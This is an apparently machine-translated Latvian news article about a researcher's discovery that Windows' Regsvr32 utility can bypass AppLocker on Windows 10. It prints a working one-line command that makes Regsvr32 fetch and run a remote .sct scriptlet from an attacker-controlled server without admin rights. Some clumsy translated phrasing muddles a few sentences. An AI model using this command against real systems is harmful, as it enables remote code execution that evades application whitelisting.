Kolorādo pētnieks Keisija Smits ir noskaidrojis, ka Regsvr32 var izmantot, lai apietu AppLocker operētājsistēmā Windows 10, un tā ir liela problēma datoru lietotājiem, īpaši tiem, kas atrodas biznesa vidē.

AppLocker pirmo reizi tika ieviests operētājsistēmās Windows 7 un Windows Server 2008 R2. Tas ir paredzēts, lai administratori varētu noteikt, kura grupa vai lietotāji var izmantot dažas vai visas lietojumprogrammas, pamatojoties uz failu unikālo identitāti. Ja esat persona, kas tiecas izmantot AppLocker, tad vispārzināms, ka to var izmantot, lai izveidotu noteiktus noteikumus, kas ļautu lietojumprogrammām palaist vai apturēt tās savās dziesmās.

Tiem, kas varētu nezināt, Regvr32 var izmantot, lai reģistrētu un reģistrētu DLL. Šis nav viena klikšķa rīks, jo tas ir komandrindas utilīts, tāpēc tikai pieredzējušiem datoru lietotājiem jācenšas izmantot tā piedāvātās iespējas.

Mēs saprotam, ka, izmantojot šo paņēmienu, tas nemaina datorsistēmas reģistru, kas administratoriem apgrūtina zināt, vai ir veiktas kādas izmaiņas.

regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

Apbrīnojams ir tas, ka regsvr32 jau apzinās starpniekserveri, izmanto TLS, seko novirzīšanai utt.… Un… Jūs uzminējāt parakstītu, noklusējuma MS bināru failu. Tātad viss, kas jums jādara, ir hostēt savu.sct failu jūsu kontrolētajā vietā, ”rakstīja Smits.

Iepriekš minētajam paņēmienam nav vajadzīgas administratīvas privilēģijas, un tas nemaina reģistru. Turklāt skriptus var izsaukt gan caur HTTP, gan ar HTTPS. Pašlaik Microsoft nav izlaidis šīs mazās problēmas labojumu, tāpēc šobrīd vienīgā iespēja ir bloķēt Regsvr32 caur Windows ugunsmūri.

Interesanti, ka programmatūras gigantam vēl nav jāreaģē uz šo drošības problēmu, ar kuru saskaras tā operētājsistēma. Tagad, kad tas ir atvērts, mēs gaidām dzirdēt kaut ko no uzņēmuma, kā arī sarunas par nākotnes plāksteri.